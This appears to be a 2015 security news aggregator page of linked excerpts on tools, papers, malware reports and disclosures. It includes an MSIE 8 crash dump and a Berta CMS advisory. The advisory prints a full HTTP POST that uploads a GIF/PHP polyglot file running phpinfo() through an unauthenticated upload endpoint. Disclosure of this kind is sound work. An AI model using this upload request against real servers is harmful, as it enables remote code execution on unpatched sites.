Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

dnscat2 beta release!

0
0
As I promised during my 2014 Derbycon talk (amongst other places), this is an initial release of my complete re-write/re-design of the dnscat service / protocol. It's now a standalone tool instead of being bundled with nbtool, among other changes. :)

more here........https://blog.skullsecurity.org/2015/dnscat2-beta-release

How to share malware with a security team?

0
0
With the recent increase of notifications of cryptolocker malware I was wondering if this dropped malware was always the same version or if the attackers used different versions. I was also curious if the delivery path (e-mail route or otherwise) was different. This raised the question : “How to share malware with a security team?”.

Some teams have a service where you can upload samples. If they do not have an upload service then you will have to use more traditional methods.

more here.........http://www.vanimpe.eu/2015/03/26/how-to-share-malware-with-a-security-team/

Imperva Releases Latest Hacker Intelligence Initiative Report: Attacking SSL When Using RC4

0
0
 Imperva, Inc. (NYSE:IMPV), committed to protecting business-critical data and applications in the cloud and on-premises, today released its latest Hacker Intelligence Initiative (HII) report, "Attacking SSL when using RC4: Breaking SSL with a 13-year old RC4 Weakness." Authored by the company's Application Defense Center (ADC) research team, the report reveals new attack vulnerabilities on the popular Transport Layer Security (TLS/SSL) protocol, which is currently used to protect as many as 30 percent of all SSL transactions, a number that may equate up to billions of TLS connections per day.

more here.........http://globenewswire.com/news-release/2015/03/26/719155/10126441/en/Imperva-Releases-Latest-Hacker-Intelligence-Initiative-Report-Attacking-SSL-When-Using-RC4.html

FBI Quietly Removes Recommendation To Encrypt Your Phone... As FBI Director Warns How Encryption Will Lead To Tears

0
0
from the keeping-you-safe...-or-keeping-you-vulnerable dept
Back in October, we highlighted the contradiction of FBI Director James Comey raging against encryption and demanding backdoors, while at the very same time the FBI's own website was suggesting mobile encryption as a way to stay safe. Sometime after that post went online, all of the information on that page about staying safe magically disappeared, though thankfully I screenshotted it at the time

more here.........https://www.techdirt.com/articles/20150325/17430330432/fbi-quietly-removes-recommendation-to-encrypt-your-phone-as-fbi-director-warns-how-encryption-will-lead-to-tears.shtml

Paper: METHODS FOR BINARY SYMBOLIC EXECUTION

0
0
Abstract
Binary symbolic execution systems are built from complicated stacks of unreliable
software components, process large program sets, and have few shallow decisions.
Failure to accurately symbolically model execution produces infeasible paths which
are difficult to debug and ultimately inhibits the development of new system features.
This dissertation describes the design and implementation of klee-mc, a novel binary
symbolic executor that emphasizes self-checking and bit-equivalence properties.
This thesis first presents cross-checking for detecting causes of infeasible paths.
Cross-checking compares outputs from similar components for equivalence and reports
mismatches at the point of divergence. This approach systematically finds errors
throughout the executor stack from binary translation to expression optimization.
The second part of this thesis considers the symbolic execution of floating-point
code. To support floating-point program instructions, klee-mc emulates floatingpoint
operations with integer-only off-the-shelf soft floating-point libraries. Symbolically
executing these libraries generates test cases where soft floating-point implementations
and floating-point constraint solvers diverge from hardware results.
The third part of this thesis discusses a term rewriting system based on program
path derived expression reduction rules. These reduction rules improve symbolic
execution performance and are machine verifiable. Additionally, these rules generalize
through further processing to optimize larger classes of expressions.
Finally, this thesis describes a flexible mechanism for symbolically dispatching
memory accesses. klee-mc forwards target program memory accesses to symbolically
executed libraries which retrieve and store memory data. These libraries simplify
access policy implementation and ease the management of rich analysis metadata

more here..........http://web.stanford.edu/~ajromano/dis.pdf

Meterpreter Survey 2015: You spoke, we listened, then wrote a bunch of code.

0
0
One month ago we asked the community for feedback about how they use Metasploit and what they want to see in the Meterpreter payload suite going forward. Over the course of a week we received over 400 responses and over 200 write-in suggestions for new features. We have spent the last month parsing through your responses, identifying dependencies, and actively delivering new features based on your requests. These requests covered 20 different categories

more here...........https://community.rapid7.com/community/metasploit/blog/2015/03/26/meterpreter-2015-you-spoke-we-listened

1501H - MSIE 8 - F12 Developer Tools tooltips use-after-free

0
0
​TL;DR: Full disclosure of low risk 0-day in MSIE 8 after 60-day deadline
passed
without a fix.

1501H - MSIE 8 - F12 Developer Tools tooltips use-after-free
=====================================

Synopsis
--------
When using the Developer Tools of MSIE 8, one might hover the mouse over a
button in the "Script" tab, at which point a "tooltip" is shown. If one then
clicks the button, a use-after-free occurs.

Known affected software and attack vectors
------------------------------------------
  + MSIE 8

    An attacker would need to get a target user to open a specially crafted
    webpage. The attacker would then need to trick the target user into
hovering
    the mouse over a button until the tooltip is shown and then click the
    button.

Description
-----------
Open a new tab, and then open the Developer Tools by pressing F12, or
selecting it from the "Tools" menu. Then select the "Scripts" tab in the
Developer Tools window. Next hover the mouse over one of the buttons with
the
text "Start Debugging", "Run Script" and "Multi Line Mode"/"Single Line
Mode".
When a tooltip is shown, click the button. Here's what happens next with
paged
heap enabled:

(4dc.814): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0b507fd0 ebx=00000200 ecx=06a48ea0 edx=00000001 esi=06a48ea0
edi=09a21fd0
eip=7427c0d6 esp=0b40f98c ebp=0b40f98c iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010202
comctl32!CToolTipsMgr::PopBubble+0xc:
7427c0d6 8b400c          mov     eax,dword ptr [eax+0Ch]
ds:0023:0b507fdc=????????

1:019> kP
ChildEBP RetAddr
0b40f98c 7427aa85 comctl32!CToolTipsMgr::PopBubble+0xc
0b40f9b4 741fc26a comctl32!CToolTipsMgr::HandleRelayedMessage+0x117
0b40faec 741fbf57 comctl32!CToolTipsMgr::ToolTipsWndProc+0x944
0b40fb18 7651c4e7 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x32
0b40fb44 7651c5e7 USER32!InternalCallWinProc+0x23
0b40fbbc 76515294 USER32!UserCallWinProcCheckWow+0x14b
0b40fbfc 76515582 USER32!SendMessageWorker+0x4d0
0b40fc1c 741fc235 USER32!SendMessageW+0x7c
0b40fc58 741f42aa comctl32!RelayToToolTips+0x49
0b40fc78 741ff5ee comctl32!TTSubclassProc+0x33
0b40fcdc 741ff490 comctl32!CallNextSubclassProc+0x3d
0b40fd3c 7651c4e7 comctl32!MasterSubclassProc+0x54
0b40fd68 7651c5e7 USER32!InternalCallWinProc+0x23
0b40fde0 7651cc19 USER32!UserCallWinProcCheckWow+0x14b
0b40fe40 7651cc70 USER32!DispatchMessageWorker+0x35e
0b40fe50 6e8e98ef USER32!DispatchMessageW+0xf
WARNING: Stack unwind information not available. Following frames may be
wrong.
0b40fe84 6e8ee3fb iedvtool+0x598ef
0b40fe9c 76ceee1c iedvtool+0x5e3fb
0b40fea8 770c37eb kernel32!BaseThreadInitThunk+0xe
0b40fee8 770c37be ntdll!__RtlUserThreadStart+0x70
0b40ff00 00000000 ntdll!_RtlUserThreadStart+0x1b

1:019> !heap -p -a @eax
    address 0b507fd0 found in
    _DPH_HEAP_ROOT @ 161000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr
VirtSize)
                                    b5119f4:          b507000
2000
    6fb3947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
    7712620b ntdll!RtlDebugReAllocateHeap+0x00000033
    770ee4f0 ntdll!RtlReAllocateHeap+0x00000054
    741f27fe comctl32!CToolTipsMgr::AddTool+0x00000031
    741f28ca comctl32!CToolTipsMgr::ToolTipsWndProc+0x000009a4
    741fbf57 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x00000032
    7651c4e7 USER32!InternalCallWinProc+0x00000023
    7651c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
    76515294 USER32!SendMessageWorker+0x000004d0
    76515582 USER32!SendMessageW+0x0000007c
    69cc8c71 jsdbgui+0x00028c71
    69cc8fa2 jsdbgui+0x00028fa2
    69cc903b jsdbgui+0x0002903b
    69cca6e2 jsdbgui+0x0002a6e2
    69cc5513 jsdbgui+0x00025513
    7651c4e7 USER32!InternalCallWinProc+0x00000023
    76535b7c USER32!UserCallDlgProcCheckWow+0x00000132
    765359f3 USER32!DefDlgProcWorker+0x000000a8
    7653a60e USER32!SendMessageWorker+0x00000340
    76515582 USER32!SendMessageW+0x0000007c
    741fc05d comctl32!CCSendNotify+0x000003e3
    741f364c comctl32!SendNotifyEx+0x00000063
    7427a9f4 comctl32!CToolTipsMgr::PopBubble+0x000000a3
    7427c016 comctl32!CToolTipsMgr::PopBubble+0x0000001c
    7427b50b comctl32!CToolTipsMgr::ShowVirtualBubble+0x00000010
    741fc26a comctl32!CToolTipsMgr::ToolTipsWndProc+0x00000944
    741fbf57 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x00000032
    7651c4e7 USER32!InternalCallWinProc+0x00000023
    7651c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
    76515294 USER32!SendMessageWorker+0x000004d0
    76515582 USER32!SendMessageW+0x0000007c
    741fc235 comctl32!RelayToToolTips+0x00000049

Exploit
-------
Because the attacker vector appears highly unlikely to represent a risk to
any
user, I did not bother to do an in-depth investigation. However, the
use-after-
free occurs in the same process in which the web-page is rendered. This
suggests
that there may be a way for the web-page to reallocate the freed memory
before
its reuse and potentially exploit this issue. However, it appears that the
free
and re-use occur in a very short time span, which would make that rather
hard if
not impossible.

Notes
-----
I allow vendors 60 days to fix an issue, unless they can provide an adequate
reason for extending this deadline. Failure to meet a deadline without an
adequate explanation will normally result in public disclosure of
information
regarding the vulnerability to the general public.

Timeline
--------
23 January 2015: vulnerability discovered and reported to MSRC by email.
23 January 2015: email from MSRC acknowledges receipt of report.
25 March 2015: email to MSRC to notify them that deadline has been exceeded.
25 March 2015: Full disclosure of vulnerability details.

Insecure file upload in Berta CMS

0
0
Berta CMS is a web based content management system using PHP and local file storage.

http://www.berta.me/

Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.

We found that the file upload didn't require authentication.

Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.

It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>

We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.

The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26

The berta-0.8.10b.zip file from: http://www.berta.me/download/  includes a fix that requires authentication to upload files.


This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).


The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.

POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php

GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$­]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64
ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ    p §Qd‹
P­s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö­a[q¥Î•P—Ë]Yy o™„ mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë     ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{        ®ç Ö„Ôàƒ$
¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <­H£A5å‚£$;FÉ£ŒJúw Z     žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v
3jy'ž„šÉç£/øY …B
h¤œ^ž f<‹’FP‹(n %¤¤² )›q
*{\j0§¦už *f;©ê£¨Ž–ª«   § Ú¦­kÒ¥`ž‚
k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/*
`ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«­ £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ ­Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³­²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k­øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°<
éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ  ;

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------2147563051636691175750543802--




Simon Waters

phone  +448454681066
email  simon.waters@surevine.com
skype  simon.waters.surevine


Participate | Collaborate | Innovate

Surevine Limited

Enough With the Salts: Updates on Secure Password Schemes

0
0
I’ve been spending some time recently combing through the old Matasano Blog Catacombs and blowing the dust off years old tomes. It’s been amazing to see how much information from years ago is still relevant today. Case in point: “Enough With the Rainbow Tables: What You Need to Know About Secure Password Schemes” by Thomas Ptacek. In that post, Tom discusses the fascination with Rainbow Tables, and gives some solid guidelines on secure password storage. He goes on to explain why the focus on rainbow tables is flawed and risks missing the true threat. If you haven’t read it, go read it now. I’ll wait.

Back? Okay, good. Now I’d like to expand on what’s changed since that post, and why its message is still relevant today.

more here........http://chargen.matasano.com/chargen/2015/3/26/enough-with-the-salts-updates-on-secure-password-schemes.html

SyScan 2015 - iOS 678 Security - A Study in Fail (Slides/Transcript)

0
0
Talk from SyScan 2015 about Apple Security failing to patch vulnerabilities over and over again, because they have apparently no QA at all on security patches.

more here.....http://www.slideshare.net/i0n1c/syscan-2015-esserios678securityastudyinfail

URSNIF: The Multifaceted Malware

0
0
The URSNIF malware family is primarily known for being a data-stealing  malware, but it’s also known for acquiring a wide variety of behavior. Known URSNIF variants include backdoors (BKDR_URSNIF.SM), spyware (TSPY_URSNIF.YNJ), and file infectors (PE_URSNIF.A-O).

more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/

Insomni’hack finals – InsomniDroid Level 1 Writeup

0
0
The challenge was delivered as a zip file (InsomniDroid.zip). The first challenge was perhaps to download it (with its 602.5 MiB). The zip file contains a single file: mmcblk0.dd. A file command gives some information
more here.....http://blog.scrt.ch/2015/03/27/insomnihack-finals-insomnidroid-level-1-writeup/

Paper: Utilizing Structural & In-execution PCB Information Analysis for Malware Detection on Linux based Smartphones & Computers

0
0
Abstract
The advent of pervasive ubiquitous computing and advancement of wireless
communication technologies has resulted in the proliferation of innovative
mobile computing devices like tablets and smartphones. In
consumer market and business community worldwide, smartphones have
become the most reliable portable devices for Internet connectivity and
sensitive data storage. As smartphones are becoming the core delivery
platform for ubiquitous “connected customer services” paradigm;
security threats and concomitant risks are also growing proportionally.
Recent reports from security vendors highlight this emerging challenge.
Additionally, smartphones pose limitations for security solution architects,
such as limited computing power, memory, battery and peripherals
etc. This makes the desktop security countermeasures infeasible for
smartphone devices. Some known anti-malware commercial products
for smartphones – by top ranked security vendors – are signature based
and require continuous updating for latest malware detection. Moreover,
these products are unable to detect the zero-day and polymorphic
malwares for smartphones. Therefore, we argue that the domain of
non-signature based anti-malware solutions for smartphones is open for
research.
In this dissertation, a novel security framework is proposed for malware
detection on Linux based computers and smartphones using different
data mining approaches.

more here.......http://nexginrc.org/Publications/pub_files/Farrukh_thesis_v2.pdf

Baidu statistics js hijacked to DDOS Github

0
0
As a Chinese living outside China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine available in China. As I was browsing one of the most popular Chinese infosec community in China, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.

This is in Chinese so utilize translation software if you do not speak the language. You can read more here http://drops.wooyun.org/papers/5398 and the translated english version here if you are unable to access translation software....http://webcache.googleusercontent.com/search?q=cache:http://insight-labs.org/?p=1682


click here for additional explanation.....https://thenanfang.com/why-baidu-was-hijacked-to-attack-github/

SSL MiTM attack in AFNetworking 2.5.1 - Do NOT use it in production!

0
0
During a recent mobile application security analysis for one of our clients, we identified a quite unobvious behaviour in apps that use the AFNetworking library.

It turned out that because of a logic flaw in the latest version of the library, SSL MiTM attacks are feasible in apps using AFNetworking 2.5.1.

more here..........http://blog.mindedsecurity.com/2015/03/ssl-mitm-attack-in-afnetworking-251-do.html

Git from the inside out

0
0
This essay explains how Git works. It assumes you understand Git well enough to use it to version control your projects.

The essay focuses on the graph structure that underpins Git and how the properties of this graph dictate Git’s behavior. This focus on fundamentals lets you build your mental model on the truth, rather than on hypotheses constructed from evidence gathered while experimenting with the API. This truer model gives you a better understanding of what Git has done, what it is doing, and what it will do.

more here.......https://codewords.recurse.com/issues/two/git-from-the-inside-out

Paper: HARES, Hardened Anti-Reverse Engineering System

0
0
ABSTRACT
This paper provides a technical overview of the
HARES software protection research effort performed
by Assured Information Security. HARES is an
anti reverse-engineering technique that uses on-CPU
encryption [6] in conjunction with Intel x86 TLBsplitting
[11] in order to significantly increase the
effort required to obtain the clear-text assembly instructions
that comprise the target x86 application.
Performance and use-cases of the system are presented,
and a number of weaknesses and future
works are discussed. Related works are compared
and contrasted with HARES in order to highlight
its improvements over the current state-of-the-art.


more here............http://jacobtorrey.com/HARES-WP.pdf

Malware Techniques: Code Streaming

0
0
This quick post will cover the topic of code streaming. For example, take malware. One way for malware to hide and persist on a system is to not contain any malicious code. This is done by getting the malicious payload through an external source, such as a direct request to a web server, a Twitter/social media post, a Pastebin, or any other common mechanism. This code, usually encrypted or obfuscated in some way, is then mapped in to the malicious process and executed. After execution, the memory region is cleaned up and reused or reallocated in order to carry out further malicious functionality.

more here.........http://www.codereversing.com/blog/?p=194

Paper: Targeted Automatic Integer Overflow Discovery Using Goal-Directed Conditional Branch Enforcement

0
0
Abstract:
We present a new technique and system, DIODE, for auto- matically generating inputs that trigger overflows at memory allocation sites. DIODE is designed to identify relevant sanity checks that inputs must satisfy to trigger overflows at target memory allocation sites, then generate inputs that satisfy these sanity checks to successfully trigger the overflow. DIODE works with off-the-shelf, production x86 binaries. Our results show that, for our benchmark set of applications, and for every target memory allocation site exercised by our seed inputs (which the applications process correctly with no overflows), either 1) DIODE is able to generate an input that triggers an overflow at that site or 2) there is no input that would trigger an overflow for the observed target expression at that site.

more here...........http://dspace.mit.edu/handle/1721.1/96155

sysmon-queries

0
0
Queries to parse sysmon event log file with Microsoft logparser

more here..........https://github.com/JamesHabben/sysmon-queries
Viewing all 8064 articles
Browse latest View live




Latest Images